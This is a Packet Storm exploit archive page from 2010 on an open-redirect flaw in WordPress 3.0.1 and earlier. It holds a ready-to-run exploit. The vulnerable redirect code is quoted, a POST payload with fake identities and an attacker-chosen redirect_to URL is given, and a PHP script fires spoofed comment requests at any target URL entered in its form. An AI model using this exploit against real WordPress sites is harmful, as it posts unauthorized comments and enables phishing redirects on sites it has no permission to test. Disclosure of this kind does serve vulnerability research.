exploit the possibilities

WordPress 3.0.1 URL Redirection

WordPress 3.0.1 URL Redirection
Posted Aug 31, 2010
Authored by ItSecTeam

WordPress versions 3.0.1 and below suffer from an URL redirection bug.

tags | exploit
MD5 | e65e12163ee044a64fbf4b4115b4c734

WordPress 3.0.1 URL Redirection

Change Mirror Download
#Title: WordPress (Version 3.0.1 And Prior) Url Redirection Bug
#Vendor: http://wordpress.org/download/
######################################################################
#AUTHOR: ITSecTeam
#Email: Bug@ITSecTeam.com
#Website: http://www.itsecteam.com
#Forum : http://forum.ITSecTeam.com
#Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability65.htm
#Thanks: Amin Shokohi(Pejvak),M3hr@n$,r3dm0v3,am!rkh@n Particular
Hookah(Dosib) :D
######################################################################
Poc : line 94-98 wordpress/wp-comments-post.php
$location = empty($_POST['redirect_to']) ? get_comment_link($comment_id) :
$_POST['redirect_to'] . '#comment-' . $comment_id;
*Varible $location equal $_POST['redirect_to']*
$location = apply_filters('comment_post_redirect', $location, $comment);
*Function Redirect Wordpress*
wp_redirect($location);
*Redirect To Varible $location*
######################################################################
Poc 2 : Usage
This Bug Worked In Request Post
Post :
comment_post_ID=1 //Post Id If Is Wrong Buf Not Worked
email=emal@yahoo.com //Fake Email Address
author=pejipeji //Fake Author Name
comment=Hi //Fake Comment
redirect_to=http://www.itsecteam.com //Url Adddress For Redirect
######################################################################
*Note : if post_ID Wrong Bug Not Worked
######################################################################
#Bug : http://localhost/wordpress/wp-comments-post.php
######################################################################
Exploit For Test :
<?php
echo "<b><center>Wordpress Vulnerability Url Redirection
Test<br>ItSecTeam.com<br></b><form action=".$_SERVER['PHP_SELF']."
method=post>Url : <input type=text size=50 value=http://www. name=url>
<input type=submit Value=' Send Request '></center></form>";

if($_POST['url']){
$ch = curl_init($_POST['url']."/wp-comments-post.php");
curl_setopt($ch, CURLOPT_POSTFIELDS,
"comment_post_ID=1&email=pejipeji".rand(1,9999)."@yahoo.com&author=pejipeji".rand(1,9999)."&comment=Hi".rand(1,9999)."&redirect_to=http://www.itsecteam.com");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$response = curl_exec($ch);
$info=null;
$info =curl_getinfo($ch);
echo $info['url'];
}
?>



Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

January 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    8 Files
  • 2
    Jan 2nd
    11 Files
  • 3
    Jan 3rd
    11 Files
  • 4
    Jan 4th
    2 Files
  • 5
    Jan 5th
    2 Files
  • 6
    Jan 6th
    18 Files
  • 7
    Jan 7th
    15 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    10 Files
  • 10
    Jan 10th
    13 Files
  • 11
    Jan 11th
    2 Files
  • 12
    Jan 12th
    4 Files
  • 13
    Jan 13th
    21 Files
  • 14
    Jan 14th
    18 Files
  • 15
    Jan 15th
    12 Files
  • 16
    Jan 16th
    18 Files
  • 17
    Jan 17th
    11 Files
  • 18
    Jan 18th
    3 Files
  • 19
    Jan 19th
    2 Files
  • 20
    Jan 20th
    15 Files
  • 21
    Jan 21st
    22 Files
  • 22
    Jan 22nd
    19 Files
  • 23
    Jan 23rd
    4 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close